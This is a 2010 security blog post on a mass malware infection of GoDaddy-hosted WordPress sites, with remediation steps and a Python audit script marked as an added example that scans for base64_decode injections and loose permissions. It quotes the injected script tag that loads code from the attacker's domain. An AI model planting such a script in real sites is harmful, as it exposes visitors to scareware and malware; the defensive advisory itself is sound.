On September 17, 2010, numerous websites hosted at GoDaddy, including WordPress blogs, were hacked with myblindstudioinfoonline[dot]com malware.
Affected websites were injected with a long malicious script at the top of .php files, which may contain something like base64_decode.
This malicious code generates a hidden script on website pages: <script src="http://myblindstudioinfoonline[dot]com/ll.php"></script>, which redirects visitors to another website.
The redirect site is a fake AV (anti-virus) scam, also known as “scareware.” This scareware tries to trick the visitor into thinking their computer is infected and offers a “download” solution. Unfortunately, this solution is a VIRUS!
On the morning of September 18, 2010, we reached out to GoDaddy for you. They informed us that their Security Team was already working diligently to identify the cause and resolve this issue. By 2:43pm CST, Go Daddy released their first statement advising all customers who believe they have a problem to change their FTP passwords and fill out their security submission form.
On September 19, 2010 at 9 pm CST, we received a new statement from Go Daddy that they've cleaned and restored all affected websites:
The exploit affecting PHP files on several Go Daddy accounts this past weekend has been resolved.
Go Daddy's Security Team worked quickly to clean and restore all affected sites. The exploit was caused by malicious files uploaded via FTP to customer websites.
As a good security practice, Go Daddy recommends all customers change their FTP passwords on a regular basis. To modify your FTP password please follow the steps provided in our help documentation at http://help.godaddy.com/article/6.
As always, Go Daddy's Security Team is here for you. If you ever suspect your site is under attack, please fill out our security submission form, located here – http://www.godaddy.com/securityissue – and notify Go Daddy's 24/7 Customer Support.
Go Daddy Chief Information Security Officer
Go Daddy has advised that they will continue to closely monitor the environment.
At this time, it's still unclear whether other websites hosted elsewhere have been affected. If you know someone hosted elsewhere that experienced this malware, please leave a comment below.
The domain name myblindstudioinfoonline[dot]com is registered to Hilary Kneber. This registrant is not an unfamiliar name. It's the same registrant from mass attacks across numerous major hosting companies in May 2010. 407 other domain names are registered to Hilary Kneber, and I don't think we've seen the last of them yet.
Stay proactive! Monitor your website 24/7 with Sucuri Web Integrity Monitoring. It's what we use and recommend to all webmasters. Use our discounted affiliate link and save: https://wpsecuritylock.com/sucuri.
Warning: If you've had an FTP breach, please do the following immediately!
- Change all of your FTP passwords (Check to see if you have more than one FTP account).
- Change your database passwords (If hackers got into your FTP, did they look at your wp-config.php file?).
- Change your Authentication Unique Keys and Salts (Again, wp-config.php).
- Change your WordPress username passwords (Change any “administrator” account passwords for safety measures).
- Check your permissions on your server. Make sure your directories (folders) are set to 755 and your files are set to 644 (Sometimes hackers like to change CHMOD permissions while they're in there).
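An added example, not from the original post or from Go Daddy: a read-only audit of a web root for the two conditions described above, a long base64_decode line near the top of a .php file and permissions other than 755 for directories and 644 for files. The 4 KiB and 300-byte thresholds, the function names and the sample tree are assumptions constructed for illustration.

```python
import os
import re
import stat
import tempfile

PATTERN = re.compile(rb"base64_decode\s*\(", re.IGNORECASE)
HEAD_BYTES = 4096   # assumption: "top of the file" means the first 4 KiB
LONG_LINE = 300     # assumption: a line over 300 bytes counts as "long"

def looks_injected(path):
    """Heuristic from the post: a long line calling base64_decode near the top."""
    with open(path, "rb") as fh:
        head = fh.read(HEAD_BYTES)
    return any(len(l) > LONG_LINE and PATTERN.search(l) for l in head.splitlines())

def audit(webroot):
    """Return (suspect .php files, [(path, octal mode)] that are not 755/644)."""
    suspects, bad_perms = [], []
    for dirpath, _dirs, files in os.walk(webroot):
        entries = [(dirpath, 0o755)] + [(os.path.join(dirpath, f), 0o644) for f in files]
        for path, expected in entries:
            st = os.lstat(path)
            if stat.S_ISLNK(st.st_mode):
                continue  # a symlink's own mode is not meaningful; review by hand
            mode = stat.S_IMODE(st.st_mode)
            if mode != expected:
                bad_perms.append((path, oct(mode)))
            if path.endswith(".php") and stat.S_ISREG(st.st_mode) and looks_injected(path):
                suspects.append(path)
    return sorted(suspects), sorted(bad_perms)

def build_sample(root):
    """Constructed sample tree; the 'injected' line is base64 of repeated 'A'."""
    os.chmod(root, 0o755)
    samples = {
        "index.php": (b"<?php echo 'hello'; ?>\n", 0o644),
        "footer.php": (b"<?php $x = base64_decode('" + b"QUFB" * 100 + b"'); ?>\n", 0o644),
        "upload.php": (b"<?php $y = base64_decode($_POST['d']); ?>\n", 0o666),
    }
    for name, (body, mode) in samples.items():
        path = os.path.join(root, name)
        with open(path, "wb") as fh:
            fh.write(body)
        os.chmod(path, mode)

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as root:
        build_sample(root)
        print(audit(root))
```

A hit from `looks_injected` is a lead for manual review, not proof of infection: legitimate code also calls base64_decode, which is why the short line in the sample's upload.php is flagged only for its 666 mode.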
For more info about myblindstudioinfoonline malware, read our previous post.
Was your WordPress site hacked but fixed and still looks funny?
Many times, WordPress users ask me why their wp-admin “Dashboard” still looks strange after it's been fixed. The answer is you need to clear your browser cookies and cache.
09-20-2010 – We'd like to send a big thank you to Rich Dougan for pointing out a typo on this post, from “we hacked” to “were hacked.” We've now updated that paragraph. We're here to slap hackers and help protect your websites. You rock, Rich!